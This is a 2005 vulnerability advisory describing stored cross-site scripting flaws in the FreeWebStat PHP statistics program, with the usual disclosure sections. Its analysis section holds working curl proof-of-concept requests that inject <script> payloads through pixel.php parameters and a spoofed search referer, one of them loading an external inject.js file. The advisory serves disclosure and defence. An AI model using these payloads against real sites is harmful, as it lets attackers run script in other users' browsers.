FreeWebStat 1.0 rev37 (the last version at the write time) is vulnerable to multiple XSS. The impact is a little bigger since datas will be stored in a flat file and the result of a single query will persist for some time on the backend. A well-timed loop of requests will assure the XSS to be permanent.
This can be used to inject arbitrary JS code into the page and make the JS pseudo-permanent, so other users will execute the JS without the need of any special url.
FreeWebStat Multiple XSS Vulnerabilities Name Multiple XSS Vulnerabilities in FreeWebStat Systems Affected FreeWebStat (verified on 1.0 rev37) Severity Medium Risk Vendor www.freewebstat.com Advisory http://www_ush_it/2005/11/25/free-web-stat/ Author Francesco "aScii" Ongaro (ascii at katamail . com) Date 20051125 I. BACKGROUND FreeWebStat is a PHP stats program, more information is available at the vendor site. II. DESCRIPTION FreeWebStat 1.0 rev37 (the last version at the write time) is vulnerable to multiple XSS. The impact is a little bugger since datas will be stored to file and the result of a single query will persist for some time on the backend. A well-timed loop of requests will assure the XSS to be permanent. We issued an advisory for an other application of the same author called "Php Web Statistik Multiple Vulnerabilities" who said "new version with all fixed bugs can be found under www.freewebstat.com". Well, we downloaded this version and seen the same type of vulnerabilities.. The old advisory: http://www_ush_it/2005/11/19/php-web-statistik/ III. ANALYSIS This vulnerability can be exploited by a GET query. 1) logdb.html XSS logdb.html is vulnerable to JS injection using anti-escape methods (eg: single quotes will be stripped but there are a lot of working workrounds for this) 1.1) Curl the pixel.php curl "http://local.asciistation.zapto.org/fws/pixel.php ?domain=<script>alert(1)</script> &site=<script>alert(2)</script> &jsref=<script>alert(3)</script> &jsres=<script>alert(4)</script> &jscolor=<script>alert(5)</script>" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" -e "http://www_ush_it" $site, $jsref, &jsres and $jscolor are vulnerable. Loading an url in $jsref will give you a full link (if the logdb.html page have any pr you can drain some of it. 1.2) Call stats.php This will generate the new logdb.html file. 1.3) Visit logdb.html You will see some alerts. : ) The order with the example query is 2 3 2 3 4 5. 1.4) Some test curls ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php? domain=ush.it&site=<script>alert(123)&jsref=1024x768 &jsres=1337&jscolor=red" -e "http://www.google.it/search?q= lello+splendor++&hl=it&lr=&start=10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php? domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=1337&jscolor=red" -e "http://www.google.it/search?q=lello+splendor++&hl=it&lr=&start= 10&sa=N" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php? domain=ush.it&site=aa&jsref=http://ww.tin.it&jsres=13 37&jscolor=red" -e "http://www.suma.it/" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php? domain=<script>alert(1)</script>&site= <script>alert(2)&jsref=</script><script>alert(3)</script> &jsres=<script>alert(4)</script>&jscolor= <script>alert(5)</script>" -A "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3))" -e "http://www_ush_it" 2) stat.php search key XSS 2) Detecting the search key XSS - if ( !in_array ( $logfile_entries [ 2 ] , $ip_archive ) ) + if (TRUE) # save the referer except the own domain name. if the browser value is empty, do not save + echo "DEBUG<h1>".$logfile_entries [ 7 ]."</h1>"; if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain ) === FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) ) ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?domain=ush.it& site=aa&jsref=sukasuka&jsres=1337&jscolor=red" Will display as many "DEBUG sukasuka" under the header and over the "summary" as the number of new queries. # save the referer except the own domain name. if the browser value is empty, do not save if ( ( strpos ( $logfile_entries [ 7 ] , $exception_domain ) === FALSE ) && ( trim ( $logfile_entries [ 7 ] ) != "" ) ) $logfile_entries[7] is the $jsref variable. ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php? site=&jsres=&jscolor=&jsref=ssss&domain=" search words ( 1 ) lello splendor 100 % 1 search engines ( 1 ) Google 100 % 1 ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php? site=&jsres=&jscolor=&jsref=http://www.google.it/search? q=lello+splendor++&hl=it" ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php? site=&jsres=&jscolor=&jsref=http://www.google.it/search? q=<script>alert(123456789)</script>++&hl=it" Now the injection is executed in 2 points, the referer table and the keyword table. 2.2) Exploiting the search key XSS stat.php give us some tricks, and we are evil. The string will be lowered and any + or - char will became a (real, not a %20) space. $terms = str_replace( '\"', "", $terms ); # delete \" $terms = strtolower( $terms ); # string to lower $terms = str_replace( "+" , " ", $terms ); # replace + with space $terms = str_replace( "-" , " ", $terms ); # replace - with space ascii> curl "http://local.asciistation.zapto.org/fws/pixel.php?site= &jsres=&jscolor=&jsref=http://www.google.it/search? q=ppoopp<script language="javascript"-src= "http://local.asciistation.zapto.org/fws/inject.js"></script>&hl=it" IV. DETECTION FreeWebStat 1.0 rev37 is vulnerable. Older version not verified. V. WORKAROUND Input validation will fix the vulnerability. VI. VENDOR RESPONSE Vendor will fix and release a new version. VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20051125 Bug discovered 20051125 Developer notification 20051125 Advisory released 20051128 Vendor response IX. CREDIT ascii is credited with the discovery of this vulnerability. X. LEGAL NOTICES Copyright (c) 2005 Francesco ?aScii? Ongaro Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.